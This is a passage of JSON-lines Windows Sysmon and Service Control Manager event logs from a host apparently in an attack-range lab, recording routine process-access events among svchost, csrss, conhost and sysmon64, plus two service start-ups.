C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-00109D800900}\r\nTargetProcessId: 3952\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-00109D800900}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.944\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-00109D800900}\r\nSourceProcessId: 3952\r\nSourceThreadId: 2892\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001000800900}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.944","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-00109D800900}","SourceProcessId":"3952","SourceThreadId":"2892","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001000800900}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6824,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76865,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76866,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6825,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6826,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6827,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6828,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 